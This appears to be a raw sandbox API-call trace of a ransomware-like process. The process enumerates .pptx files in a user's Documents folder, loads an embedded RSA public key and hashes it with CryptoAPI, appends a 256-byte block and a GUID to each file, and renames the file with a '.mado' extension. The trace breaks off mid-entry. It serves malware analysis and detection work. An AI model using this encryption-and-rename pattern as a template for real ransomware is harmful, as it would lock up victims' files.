[0204.147] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.149] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.149] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x3d0e, lpOverlapped=0x0) returned 1 [0204.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.149] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.150] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.150] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.150] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.150] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.150] GetLastError () returned 0x0 [0204.150] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.150] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.150] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.150] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.151] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3d10) returned 0x3b74b68 [0204.151] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e5e8 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe070 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e630 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe088 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0b8 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0d0 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.151] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b78880 [0204.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0b8 | out: hHeap=0x2c0000) returned 1 [0204.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0d0 | out: hHeap=0x2c0000) returned 1 [0204.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b78880 | out: hHeap=0x2c0000) returned 1 [0204.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe0d0 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe0b8 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bc98 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bdb0 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0d0 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0b8 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.152] GetCurrentThreadId () returned 0x600 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b70e50 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6f0a8 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.153] GetCurrentThreadId () returned 0x600 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0b8 [0204.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.154] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3d0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.154] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.154] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.154] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.154] CloseHandle (hObject=0x63c) returned 1 [0204.155] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ulqu akyI-EFV4fSDQDc.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ulqu akyi-efv4fsdqdc.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ulqu akyI-EFV4fSDQDc.pptx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ulqu akyi-efv4fsdqdc.pptx.mado")) returned 1 [0204.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.156] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.157] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84c5cae0, ftCreationTime.dwHighDateTime=0x1d5927d, ftLastAccessTime.dwLowDateTime=0x647dca30, ftLastAccessTime.dwHighDateTime=0x1d57bda, ftLastWriteTime.dwLowDateTime=0x647dca30, ftLastWriteTime.dwHighDateTime=0x1d57bda, nFileSizeHigh=0x0, nFileSizeLow=0x14e15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcu-S1_L5cVixC1jBX9Z.pptx", cAlternateFileName="VCU-S1~1.PPT")) returned 1 [0204.157] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vcu-S1_L5cVixC1jBX9Z.pptx") returned=".pptx" [0204.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vcu-S1_L5cVixC1jBX9Z.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vcu-s1_l5cvixc1jbx9z.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.157] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=85525) returned 1 [0204.158] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.160] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14def, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.160] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.161] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x14e15, lpOverlapped=0x0) returned 1 [0204.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.162] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.163] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.163] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.163] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.163] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.163] GetLastError () returned 0x0 [0204.163] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.163] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.163] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.163] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.163] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.164] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0d0 | out: hHeap=0x2c0000) returned 1 [0204.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe118 | out: hHeap=0x2c0000) returned 1 [0204.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe118 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe0e8 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe0d0 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0d0 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe118 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.165] GetCurrentThreadId () returned 0x600 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68078 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b70ee0 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68180 [0204.165] RtlAllocateHeap 